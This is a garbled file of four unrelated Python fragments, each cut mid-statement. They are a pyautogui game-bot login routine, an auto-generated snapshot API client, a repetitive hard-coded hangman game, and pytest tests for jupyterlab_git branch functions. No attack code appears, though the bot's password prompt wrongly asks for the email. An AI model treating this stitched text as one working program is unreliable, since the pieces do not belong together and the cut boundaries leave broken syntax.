guest = utils.timedInput("Login? Or play as a guest? Press CTRL+C to begin typing.", 10, ["guest", "log"])
if guest is True or guest is None:
utils.debugPrint("Playing as guest.")
pyautogui.click(pos1)
return False
else:
utils.debugPrint("Logging in.")
pyautogui.click(pos)
return True
def logIn(self):
email = ""
password = ""
acct = utils.timedInput("Do you have an account you\'d like the bot to play on? Press CTRL+C to begin typing.")
if acct is False or acct is None:
print("Using default.")
with open("default.txt", "r") as f:
for line in f:
if line is None:
utils.debugPrint("No default account found.")
else:
email, password = line.split(" ")
else:
email = input("Please enter the email. No time limit. Does not save your info.\n:")
password = input("Please enter the email. No time limit. Does not save your info.\n:")
self.click(constants.img_emailArea, self.gameWindow)
pyautogui.typewrite(email)
time.sleep(.5)
self.click(constants.img_passwordArea, self.gameWindow)
pyautogui.typewrite(password)
time.sleep(.5)
self.click(constants.img_loginButton3, self.gameWindow)
def decideGame(self, attempts):
attempts += 1
for i in range(1, attempts + 1):
utils.debugPrint("Initiating game selection.")
gM = self.gameMenuSearch(5)
if gM is False:
url = utils.CheckForUrl(5)
if url is False:
proceed = utils.timedInput(
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/repstates', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SnapshotRepstatesExtended', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_snapshot_schedules(self, **kwargs): # noqa: E501
"""list_snapshot_schedules # noqa: E501
List all or matching schedules. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_snapshot_schedules(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str sort: The field that will be used for sorting. Choices are id, name, path, pattern, schedule, duration, alias, next_run, and next_snapshot. Default is id.
:param int limit: Return no more than this many results at once (see resume).
:param str dir: The direction of the sort.
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:return: SnapshotSchedulesExtended
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_snapshot_schedules_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_snapshot_schedules_with_http_info(**kwargs) # noqa: E501
return data
def list_snapshot_schedules_with_http_info(self, **kwargs): # noqa: E501
"""list_snapshot_schedules # noqa: E501
List all or matching schedules. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_snapshot_schedules_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str sort: The field that will be used for sorting. Choices are id, name, path, pattern, schedule, duration, alias, next_run, and next_snapshot. Default is id.
:param int limit: Return no more than this many results at once (see resume).
:param str dir: The direction of the sort.
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:return: SnapshotSchedulesExtended
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['sort', 'limit', 'dir', 'resume'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_snapshot_schedules" % key
)
params[key] = val
del params['kwargs']
if 'limit' in params and params['limit'] > 4294967295: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `list_snapshot_schedules`, must be a value less than or equal to `4294967295`") # noqa: E501
if 'limit' in params and params['limit'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `list_snapshot_schedules`, must be a value greater than or equal to `1`") # noqa: E501
if ('dir' in params and
len(params['dir']) < 0):
raise ValueError("Invalid value for parameter `dir` when calling `list_snapshot_schedules`, length must be greater than or equal to `0`") # noqa: E501
if ('resume' in params and
len(params['resume']) > 8192):
raise ValueError("Invalid value for parameter `resume` when calling `list_snapshot_schedules`, length must be less than or equal to `8192`") # noqa: E501
if ('resume' in params and
len(params['resume']) < 0):
raise ValueError("Invalid value for parameter `resume` when calling `list_snapshot_schedules`, length must be greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'dir' in params:
query_params.append(('dir', params['dir'])) # noqa: E501
if 'resume' in params:
query_params.append(('resume', params['resume'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/snapshot/schedules', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SnapshotSchedulesExtended', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
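    # Paging sketch (illustrative; assumes ``api`` is an instance of this
    # generated client and that the response model exposes the ``resume``
    # token the docstring describes; ``resume`` must then be the only option
    # on follow-up calls):
    #
    #   page = api.list_snapshot_schedules(limit=100)
    #   while getattr(page, 'resume', None):
    #       page = api.list_snapshot_schedules(resume=page.resume)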
def list_snapshot_snapshots(self, **kwargs): # noqa: E501
"""list_snapshot_snapshots # noqa: E501
List all or matching snapshots. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_snapshot_snapshots(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str sort: The field that will be used for sorting. Choices are id, name, path, created, expires, size, has_locks, schedule, alias_target, alias_target_name, pct_filesystem, pct_reserve, and state. Default is id.
:param str schedule: Only list snapshots created by this schedule.
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:param str state: Only list snapshots matching this state.
:param int limit: Return no more than this many results at once (see resume).
:param str type: Only list snapshots matching this type.
:param str dir: The direction of the sort.
:return: SnapshotSnapshotsExtended
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_snapshot_snapshots_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_snapshot_snapshots_with_http_info(**kwargs) # noqa: E501
return data
def list_snapshot_snapshots_with_http_info(self, **kwargs): # noqa: E501
"""list_snapshot_snapshots # noqa: E501
List all or matching snapshots. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_snapshot_snapshots_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str sort: The field that will be used for sorting. Choices are id, name, path, created, expires, size, has_locks, schedule, alias_target, alias_target_name, pct_filesystem, pct_reserve, and state. Default is id.
:param str schedule: Only list snapshots created by this schedule.
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:param str state: Only list snapshots matching this state.
:param int limit: Return no more than this many results at once (see resume).
:param str type: Only list snapshots matching this type.
:param str dir: The direction of the sort.
:return: SnapshotSnapshotsExtended
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['sort', 'schedule', 'resume', 'state', 'limit', 'type', 'dir'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_snapshot_snapshots" % key
)
params[key] = val
del params['kwargs']
if ('resume' in params and
len(params['resume']) > 8192):
raise ValueError("Invalid value for parameter `resume` when calling `list_snapshot_snapshots`, length must be less than or equal to `8192`") # noqa: E501
if ('resume' in params and
len(params['resume']) < 0):
raise ValueError("Invalid value for parameter `resume` when calling `list_snapshot_snapshots`, length must be greater than or equal to `0`") # noqa: E501
if 'limit' in params and params['limit'] > 4294967295: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `list_snapshot_snapshots`, must be a value less than or equal to `4294967295`") # noqa: E501
if 'limit' in params and params['limit'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `list_snapshot_snapshots`, must be a value greater than or equal to `1`") # noqa: E501
if ('dir' in params and
len(params['dir']) < 0):
raise ValueError("Invalid value for parameter `dir` when calling `list_snapshot_snapshots`, length must be greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
if 'schedule' in params:
query_params.append(('schedule', params['schedule'])) # noqa: E501
if 'resume' in params:
query_params.append(('resume', params['resume'])) # noqa: E501
if 'state' in params:
query_params.append(('state', params['state'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'type' in params:
query_params.append(('type', params['type'])) # noqa: E501
if 'dir' in params:
query_params.append(('dir', params['dir'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
word[1] == "z" :
toGuess = toGuess[:1] + "z" + toGuess[2:]
if word[2] == "Z" or word[2] == "z" :
toGuess = toGuess[:2] + "z" + toGuess[3:]
if word[3] == "Z" or word[3] == "z" :
toGuess = toGuess[:3] + "z" + toGuess[4:]
if word[4] == "Z" or word[4] == "z" :
toGuess = toGuess[:4] + "z" + toGuess[5:]
if word[5] == "Z" or word[5] == "z" :
toGuess = toGuess[:5] + "z" + toGuess[6:]
if word[1] != "Z" and word[1] != "z" and word[2] != "Z" and word[2] != "z" and word[3] != "Z" and word[3] != "z" and word[4] != "Z" and word[4] != "z" and word[5] != "Z" and word[5] != "z" :
print("\nWrong!\n")
numberOfErrors = numberOfErrors + 1
wrongChars = wrongChars + "z" + ", "
if numberOfErrors == 0 :
print("\t___________")
print("\t| |")
print("\t|")
print("\t|")
print("\t|")
print("\t|")
print("\t|")
if numberOfErrors == 1 :
print("\t___________")
print("\t| |")
print("\t| O")
print("\t|")
print("\t|")
print("\t|")
print("\t|")
if numberOfErrors == 2 :
print("\t___________")
print("\t| |")
print("\t| O")
print("\t| |")
print("\t|")
print("\t|")
print("\t|")
if numberOfErrors == 3 :
print("\t___________")
print("\t| |")
print("\t| O")
print("\t| /|")
print("\t|")
print("\t|")
print("\t|")
if numberOfErrors == 4 :
print("\t___________")
print("\t| |")
print("\t| O")
print("\t| /|\\")
print("\t|")
print("\t|")
print("\t|")
if numberOfErrors == 5 :
print("\t___________")
print("\t| |")
print("\t| O")
print("\t| /|\\")
print("\t| / ")
print("\t|")
print("\t|")
if numberOfErrors == 6 :
print("\t___________")
print("\t| |")
print("\t| O")
print("\t| /|\\")
print("\t| / \\")
print("\t|")
print("\t|")
print("\nYou lose! GAME OVER\n")
print("The answer was \"" + word + "\"")
loser = True
if not loser :
print("\n\tWord: " + toGuess)
print("\tMisses: " + wrongChars)
if "_" in toGuess and not loser :
guessChar = ""
while not guessChar.isalpha() :
guessChar = input("\n---------------------------------\nEnter your letter: ")
_ = os.system('cls' if os.name=='nt' else 'clear')
if guessChar == "A" or guessChar == "a" :
if word[1] == "A" or word[1] == "a" :
toGuess = toGuess[:1] + "a" + toGuess[2:]
if word[2] == "A" or word[2] == "a" :
toGuess = toGuess[:2] + "a" + toGuess[3:]
if word[3] == "A" or word[3] == "a" :
toGuess = toGuess[:3] + "a" + toGuess[4:]
if word[4] == "A" or word[4] == "a" :
toGuess = toGuess[:4] + "a" + toGuess[5:]
if word[5] == "A" or word[5] == "a" :
toGuess = toGuess[:5] + "a" + toGuess[6:]
if word[1] != "A" and word[1] != "a" and word[2] != "A" and word[2] != "a" and word[3] != "A" and word[3] != "a" and word[4] != "A" and word[4] != "a" and word[5] != "A" and word[5] != "a" :
print("\nWrong!\n")
numberOfErrors = numberOfErrors + 1
wrongChars = wrongChars + "a" + ", "
if guessChar == "B" or guessChar == "b" :
if word[1] == "B" or word[1] == "b" :
toGuess = toGuess[:1] + "b" + toGuess[2:]
if word[2] == "B" or word[2] == "b" :
toGuess = toGuess[:2] + "b" + toGuess[3:]
if word[3] == "B" or word[3] == "b" :
toGuess = toGuess[:3] + "b" + toGuess[4:]
if word[4] == "B" or word[4] == "b" :
toGuess = toGuess[:4] + "b" + toGuess[5:]
if word[5] == "B" or word[5] == "b" :
toGuess = toGuess[:5] + "b" + toGuess[6:]
if word[1] != "B" and word[1] != "b" and word[2] != "B" and word[2] != "b" and word[3] != "B" and word[3] != "b" and word[4] != "B" and word[4] != "b" and word[5] != "B" and word[5] != "b" :
print("\nWrong!\n")
numberOfErrors = numberOfErrors + 1
wrongChars = wrongChars + "b" + ", "
if guessChar == "C" or guessChar == "c" :
if word[1] == "C" or word[1] == "c" :
toGuess = toGuess[:1] + "c" + toGuess[2:]
if word[2] == "C" or word[2] == "c" :
toGuess = toGuess[:2] + "c" + toGuess[3:]
if word[3] == "C" or word[3] == "c" :
toGuess = toGuess[:3] + "c" + toGuess[4:]
if word[4] == "C" or word[4] == "c" :
toGuess = toGuess[:4] + "c" + toGuess[5:]
if word[5] == "C" or word[5] == "c" :
toGuess = toGuess[:5] + "c" + toGuess[6:]
if word[1] != "C" and word[1] != "c" and word[2] != "C" and word[2] != "c" and word[3] != "C" and word[3] != "c" and word[4] != "C" and word[4] != "c" and word[5] != "C" and word[5] != "c" :
print("\nWrong!\n")
numberOfErrors = numberOfErrors + 1
wrongChars = wrongChars + "c" + ", "
if guessChar == "D" or guessChar == "d" :
if word[1] == "D" or word[1] == "d" :
toGuess = toGuess[:1] + "d" + toGuess[2:]
if word[2] == "D" or word[2] == "d" :
toGuess = toGuess[:2] + "d" + toGuess[3:]
if word[3] == "D" or word[3] == "d" :
toGuess = toGuess[:3] + "d" + toGuess[4:]
if word[4] == "D" or word[4] == "d" :
toGuess = toGuess[:4] + "d" + toGuess[5:]
if word[5] == "D" or word[5] == "d" :
toGuess = toGuess[:5] + "d" + toGuess[6:]
if word[1] != "D" and word[1] != "d" and word[2] != "D" and word[2] != "d" and word[3] != "D" and word[3] != "d" and word[4] != "D" and word[4] != "d" and word[5] != "D" and word[5] != "d" :
print("\nWrong!\n")
numberOfErrors = numberOfErrors + 1
wrongChars = wrongChars + "d" + ", "
if guessChar == "E" or guessChar == "e" :
if word[1] == "E" or word[1] == "e" :
toGuess = toGuess[:1] + "e" + toGuess[2:]
if word[2] == "E" or word[2] == "e" :
toGuess = toGuess[:2] + "e" + toGuess[3:]
if word[3] == "E" or word[3] == "e" :
toGuess = toGuess[:3] + "e" + toGuess[4:]
if word[4] == "E" or word[4] == "e" :
toGuess = toGuess[:4] + "e" + toGuess[5:]
if word[5] == "E" or word[5] == "e" :
toGuess = toGuess[:5] + "e" + toGuess[6:]
if word[1] != "E" and word[1] != "e" and word[2] != "E" and word[2] != "e" and word[3] != "E" and word[3] != "e" and word[4] != "E" and word[4] != "e" and word[5] != "E" and word[5] != "e" :
print("\nWrong!\n")
numberOfErrors = numberOfErrors + 1
wrongChars = wrongChars + "e" + ", "
if guessChar == "F" or guessChar == "f" :
if word[1] == "F" or word[1] == "f" :
toGuess = toGuess[:1] + "f" + toGuess[2:]
if word[2] == "F" or word[2] == "f" :
toGuess = toGuess[:2] + "f" + toGuess[3:]
if word[3] == "F" or word[3] == "f" :
toGuess = toGuess[:3] + "f" + toGuess[4:]
if word[4] == "F" or word[4] == "f" :
toGuess = toGuess[:4] + "f" + toGuess[5:]
if word[5] == "F" or word[5] == "f" :
toGuess = toGuess[:5] + "f" + toGuess[6:]
if word[1] != "F" and word[1] != "f" and word[2] != "F" and word[2] != "f" and word[3] != "F" and word[3] != "f" and word[4] != "F" and word[4] != "f" and word[5] != "F" and word[5] != "f" :
print("\nWrong!\n")
numberOfErrors = numberOfErrors + 1
wrongChars = wrongChars + "f" + ", "
if guessChar == "G" or guessChar == "g" :
if word[1] == "G" or word[1] == "g" :
toGuess = toGuess[:1] + "g" + toGuess[2:]
if word[2] == "G" or word[2] == "g" :
toGuess = toGuess[:2] + "g" + toGuess[3:]
if word[3] == "G" or word[3] == "g" :
toGuess = toGuess[:3] + "g" + toGuess[4:]
if word[4] == "G" or word[4] == "g" :
toGuess = toGuess[:4] + "g" + toGuess[5:]
if word[5] == "G" or word[5] == "g" :
toGuess = toGuess[:5] + "g" + toGuess[6:]
if word[1] != "G" and word[1] != "g" and word[2] != "G" and word[2] != "g" and word[3] != "G" and word[3] != "g" and word[4] != "G" and word[4] != "g" and word[5] != "G" and word[5] != "g" :
print("\nWrong!\n")
numberOfErrors = numberOfErrors + 1
wrongChars = wrongChars + "g" + ", "
if guessChar == "H" or guessChar == "h" :
if word[1] == "H" or word[1] == "h" :
toGuess = toGuess[:1] + "h" + toGuess[2:]
if word[2] == "H" or word[2] == "h" :
toGuess = toGuess[:2] + "h" + toGuess[3:]
if word[3] == "H" or word[3] == "h" :
toGuess = toGuess[:3] + "h" + toGuess[4:]
if word[4] == "H" or word[4] == "h" :
toGuess = toGuess[:4] + "h" + toGuess[5:]
if word[5] == "H" or word[5] == "h" :
toGuess = toGuess[:5] + "h" + toGuess[6:]
if word[1] != "H" and word[1] != "h" and word[2] != "H" and word[2] != "h" and word[3] != "H" and word[3] != "h" and word[4] != "H" and word[4] != "h" and word[5] != "H" and word[5] != "h" :
print("\nWrong!\n")
numberOfErrors = numberOfErrors + 1
wrongChars = wrongChars + "h" + ", "
if guessChar == "I" or guessChar == "i" :
if word[1] == "I" or word[1] == "i" :
toGuess = toGuess[:1] + "i" + toGuess[2:]
if word[2] == "I" or word[2] == "i" :
toGuess = toGuess[:2] + "i" + toGuess[3:]
if word[3] | |
from pathlib import Path
from unittest.mock import call, patch
import pytest
from jupyterlab_git.git import Git
from .testutils import maybe_future
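# For orientation, a minimal sketch of what ``maybe_future`` plausibly does
# (an assumption for illustration -- the real helper lives in .testutils):
# wrap a plain value in an awaitable so it can stand in for the async
# ``execute`` call in the mocks below.
#
#   import asyncio
#   def maybe_future(value):
#       future = asyncio.Future()
#       future.set_result(value)
#       return future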
@pytest.mark.parametrize(
"branch,expected",
[
("refs/heads/feature-foo", False),
("refs/heads/master", False),
("refs/remotes/origin/feature-foo", True),
("refs/remotes/origin/HEAD", True),
("refs/stash", False),
("refs/tags/v0.1.0", False),
("refs/tags/blah@0.2.0", False),
],
)
def test_is_remote_branch(branch, expected):
actual_response = Git()._is_remote_branch(branch)
assert expected == actual_response
@pytest.mark.asyncio
async def test_get_current_branch_success():
with patch("jupyterlab_git.git.execute") as mock_execute:
# Given
mock_execute.return_value = maybe_future((0, "feature-foo", ""))
# When
actual_response = await (
Git().get_current_branch(path=str(Path("/bin/test_curr_path")))
)
# Then
mock_execute.assert_called_once_with(
["git", "symbolic-ref", "--short", "HEAD"],
cwd=str(Path("/bin") / "test_curr_path"),
)
assert "feature-foo" == actual_response
@pytest.mark.asyncio
async def test_checkout_branch_noref_success():
branch = "test-branch"
curr_path = str(Path("/bin/test_curr_path"))
stdout_message = "checkout output from git"
stderr_message = ""
rc = 0
with patch("jupyterlab_git.git.execute") as mock_execute:
with patch.object(
Git, "_get_branch_reference", return_value=maybe_future(None)
) as mock__get_branch_reference:
# Given
mock_execute.return_value = maybe_future(
(rc, stdout_message, stderr_message)
)
# When
actual_response = await Git().checkout_branch(
branchname=branch, path=curr_path
)
# Then
mock__get_branch_reference.assert_has_calls([call(branch, curr_path)])
cmd = ["git", "checkout", branch]
mock_execute.assert_called_once_with(
cmd,
cwd=str(Path("/bin") / "test_curr_path"),
)
assert {"code": rc, "message": stdout_message} == actual_response
@pytest.mark.asyncio
async def test_checkout_branch_noref_failure():
branch = "test-branch"
curr_path = str(Path("/bin/test_curr_path"))
stdout_message = ""
stderr_message = (
"error: pathspec '{}' did not match any file(s) known to git".format(branch)
)
rc = 1
with patch("jupyterlab_git.git.execute") as mock_execute:
with patch.object(
Git, "_get_branch_reference", return_value=maybe_future(None)
) as mock__get_branch_reference:
# Given
mock_execute.return_value = maybe_future(
(rc, stdout_message, stderr_message)
)
# When
actual_response = await Git().checkout_branch(
branchname=branch, path=curr_path
)
# Then
mock__get_branch_reference.assert_has_calls([call(branch, curr_path)])
cmd = ["git", "checkout", branch]
mock_execute.assert_called_once_with(
cmd,
cwd=str(Path("/bin") / "test_curr_path"),
)
assert {
"code": rc,
"message": stderr_message,
"command": " ".join(cmd),
} == actual_response
@pytest.mark.asyncio
async def test_checkout_branch_remoteref_success():
branch = "origin/test-branch"
local_branch = "test-branch"
curr_path = str(Path("/bin/test_curr_path"))
stdout_message = "checkout output from git"
stderr_message = ""
rc = 0
with patch("jupyterlab_git.git.execute") as mock_execute:
with patch.object(
Git,
"_get_branch_reference",
return_value=maybe_future("refs/remotes/remote_branch"),
) as mock__get_branch_reference:
# Given
mock_execute.return_value = maybe_future(
(rc, stdout_message, stderr_message)
)
# When
actual_response = await Git().checkout_branch(
branchname=branch, path=curr_path
)
# Then
mock__get_branch_reference.assert_has_calls([call(branch, curr_path)])
cmd = ["git", "checkout", "-B", local_branch, branch]
mock_execute.assert_called_once_with(
cmd,
cwd=str(Path("/bin") / "test_curr_path"),
)
assert {"code": rc, "message": stdout_message} == actual_response
@pytest.mark.asyncio
async def test_checkout_branch_headsref_failure():
branch = "test-branch"
curr_path = str(Path("/bin/test_curr_path"))
stdout_message = ""
stderr_message = (
"error: pathspec '{}' did not match any file(s) known to git".format(branch)
)
rc = 1
with patch("jupyterlab_git.git.execute") as mock_execute:
with patch.object(
Git,
"_get_branch_reference",
return_value=maybe_future("refs/heads/local_branch"),
) as mock__get_branch_reference:
# Given
mock_execute.return_value = maybe_future(
(rc, stdout_message, stderr_message)
)
# When
actual_response = await Git().checkout_branch(
branchname=branch, path=curr_path
)
# Then
mock__get_branch_reference.assert_has_calls([call(branch, curr_path)])
cmd = ["git", "checkout", branch]
mock_execute.assert_called_once_with(
cmd,
cwd=str(Path("/bin") / "test_curr_path"),
)
assert {
"code": rc,
"message": stderr_message,
"command": " ".join(cmd),
} == actual_response
@pytest.mark.asyncio
async def test_checkout_branch_headsref_success():
branch = "test-branch"
stdout_message = "checkout output from git"
stderr_message = ""
rc = 0
with patch("jupyterlab_git.git.execute") as mock_execute:
with patch.object(
Git,
"_get_branch_reference",
return_value=maybe_future("refs/heads/local_branch"),
):
# Given
mock_execute.return_value = maybe_future(
(rc, stdout_message, stderr_message)
)
# When
actual_response = await Git().checkout_branch(
branchname=branch, path=str(Path("/bin/test_curr_path"))
)
# Then
cmd = ["git", "checkout", branch]
mock_execute.assert_called_once_with(
cmd,
cwd=str(Path("/bin") / "test_curr_path"),
)
assert {"code": rc, "message": stdout_message} == actual_response
@pytest.mark.asyncio
async def test_checkout_branch_remoteref_failure():
branch = "origin/test-branch"
local_branch = "test-branch"
stdout_message = ""
stderr_message = (
"error: pathspec '{}' did not match any file(s) known to git".format(branch)
)
rc = 1
with patch("jupyterlab_git.git.execute") as mock_execute:
with patch.object(
Git,
"_get_branch_reference",
return_value=maybe_future("refs/remotes/remote_branch"),
):
# Given
mock_execute.return_value = maybe_future(
(rc, stdout_message, stderr_message)
)
# When
actual_response = await Git().checkout_branch(
branchname=branch, path=str(Path("/bin/test_curr_path"))
)
# Then
cmd = ["git", "checkout", "-B", local_branch, branch]
mock_execute.assert_called_once_with(
cmd,
cwd=str(Path("/bin") / "test_curr_path"),
)
assert {
"code": rc,
"message": stderr_message,
"command": " ".join(cmd),
} == actual_response
@pytest.mark.asyncio
async def test_get_branch_reference_success():
with patch("jupyterlab_git.git.execute") as mock_execute:
# Given
actual_response = 0
branch = "test-branch"
reference = "refs/remotes/origin/test_branch"
mock_execute.return_value = maybe_future((0, reference, ""))
# When
actual_response = await Git()._get_branch_reference(
branchname=branch, path=str(Path("/bin/test_curr_path"))
)
# Then
mock_execute.assert_called_once_with(
["git", "rev-parse", "--symbolic-full-name", branch],
cwd=str(Path("/bin") / "test_curr_path"),
)
assert actual_response == reference
@pytest.mark.asyncio
async def test_get_branch_reference_failure():
with patch("jupyterlab_git.git.execute") as mock_execute:
actual_response = 0
branch = "test-branch"
reference = "test-branch"
# Given
mock_execute.return_value = maybe_future(
(
128,
reference,
"fatal: ambiguous argument '{}': unknown revision or path not in the working tree.".format(
branch
),
)
)
# When
actual_response = await Git()._get_branch_reference(
branchname=branch, path=str(Path("/bin/test_curr_path"))
)
# Then
mock_execute.assert_called_once_with(
["git", "rev-parse", "--symbolic-full-name", branch],
cwd=str(Path("/bin") / "test_curr_path"),
)
assert actual_response is None
@pytest.mark.asyncio
async def test_get_current_branch_failure():
with patch("jupyterlab_git.git.execute") as mock_execute:
# Given
mock_execute.return_value = maybe_future(
(
128,
"",
"fatal: Not a git repository (or any of the parent directories): .git",
)
)
# When
with pytest.raises(Exception) as error:
await Git().get_current_branch(path=str(Path("/bin/test_curr_path")))
# Then
mock_execute.assert_called_once_with(
["git", "symbolic-ref", "--short", "HEAD"],
cwd=str(Path("/bin") / "test_curr_path"),
)
assert (
"Error [fatal: Not a git repository (or any of the parent directories): .git] "
"occurred while executing [git symbolic-ref --short HEAD] command to get current branch."
== str(error.value)
)
@pytest.mark.asyncio
async def test_get_current_branch_detached_success():
with patch("jupyterlab_git.git.execute") as mock_execute:
# Given
process_output = [
"* (HEAD detached at origin/feature-foo)",
" master",
" remotes/origin/feature-foo",
" remotes/origin/HEAD",
]
mock_execute.return_value = maybe_future((0, "\n".join(process_output), ""))
# When
actual_response = await Git()._get_current_branch_detached(
path=str(Path("/bin/test_curr_path"))
)
# Then
mock_execute.assert_called_once_with(
["git", "branch", "-a"],
cwd=str(Path("/bin") / "test_curr_path"),
)
assert "(HEAD detached at origin/feature-foo)" == actual_response
@pytest.mark.asyncio
async def test_get_current_branch_detached_failure():
with patch("jupyterlab_git.git.execute") as mock_execute:
# Given
mock_execute.return_value = maybe_future(
(
128,
"",
"fatal: Not a git repository (or any of the parent directories): .git",
)
)
# When
with pytest.raises(Exception) as error:
await Git()._get_current_branch_detached(
path=str(Path("/bin/test_curr_path"))
)
# Then
mock_execute.assert_called_once_with(
["git", "branch", "-a"],
cwd=str(Path("/bin") / "test_curr_path"),
)
assert (
"Error [fatal: Not a git repository (or any of the parent directories): .git] "
"occurred while executing [git branch -a] command to get detached HEAD name."
== str(error.value)
)
@pytest.mark.asyncio
@pytest.mark.parametrize(
"branch,upstream,remotename",
[
("feature-foo", "master", "origin/withslash"),
("master", "master", "origin"),
("feature/bar", "feature-foo", ""),
        # Test an upstream branch name that starts with a letter contained in the remote name
("rbranch", "rbranch", "origin"),
],
)
async def test_get_upstream_branch_success(branch, upstream, remotename):
with patch("jupyterlab_git.git.execute") as mock_execute:
# Given
mock_execute.side_effect = [
maybe_future((0, remotename + "/" + upstream, "")),
maybe_future((0, remotename, "")),
]
# When
actual_response = await Git().get_upstream_branch(
path=str(Path("/bin/test_curr_path")), branch_name=branch
)
# Then
mock_execute.assert_has_calls(
[
call(
[
"git",
"rev-parse",
"--abbrev-ref",
"{}@{{upstream}}".format(branch),
],
cwd=str(Path("/bin") / "test_curr_path"),
),
call(
["git", "config", "--local", "branch.{}.remote".format(branch)],
cwd=str(Path("/bin") / "test_curr_path"),
),
],
any_order=False,
)
assert {
"code": 0,
"remote_branch": upstream,
"remote_short_name": remotename,
} == actual_response
@pytest.mark.asyncio
@pytest.mark.parametrize(
"outputs, message",
[
(
(128, "", "fatal: no such branch: 'blah'"),
"Error [fatal: no such branch: 'blah'] "
"occurred while executing [git rev-parse --abbrev-ref blah@{upstream}] command to get upstream branch.",
),
((128, "", "fatal: no upstream configured for branch"), ""),
(
(
128,
"",
"fatal: ambiguous argument 'blah@origin': unknown revision or path not in the working tree.",
),
"",
),
],
)
async def test_get_upstream_branch_failure(outputs, message):
with patch("jupyterlab_git.git.execute") as mock_execute:
# Given
mock_execute.return_value = maybe_future(outputs)
# When
response = await Git().get_upstream_branch(
path=str(Path("/bin/test_curr_path")), branch_name="blah"
)
expected = {
"code": 128,
"command": "git rev-parse --abbrev-ref blah@{upstream}",
"message": outputs[2],
}
assert response == expected
# Then
mock_execute.assert_has_calls(
[
call(
["git", "rev-parse", "--abbrev-ref", "blah@{upstream}"],
cwd=str(Path("/bin") / "test_curr_path"),
)
],
any_order=False,
)
@pytest.mark.asyncio
async def test_get_tag_success():
with patch("jupyterlab_git.git.execute") as mock_execute:
# Given
mock_execute.return_value = maybe_future((0, "v0.3.0", ""))
# When
actual_response = await Git()._get_tag(
path=str(Path("/bin/test_curr_path")),
commit_sha="abcdefghijklmnopqrstuvwxyz01234567890123",
)
# Then
mock_execute.assert_called_once_with(
["git", "describe", "--tags", "abcdefghijklmnopqrstuvwxyz01234567890123"],
cwd=str(Path("/bin") / "test_curr_path"),
)
assert "v0.3.0" == actual_response
@pytest.mark.asyncio
async def test_get_tag_failure():
with patch("jupyterlab_git.git.execute") as mock_execute:
# Given
mock_execute.side_effect = [
maybe_future((128, "", "fatal: Not a valid object name blah")),
maybe_future(
(
128,
"",
"fatal: No tags can describe '01234567899999abcdefghijklmnopqrstuvwxyz'.",
)
),
]
# When
with pytest.raises(Exception) as error:
await Git()._get_tag(
path=str(Path("/bin/test_curr_path")), commit_sha="blah"
)
assert (
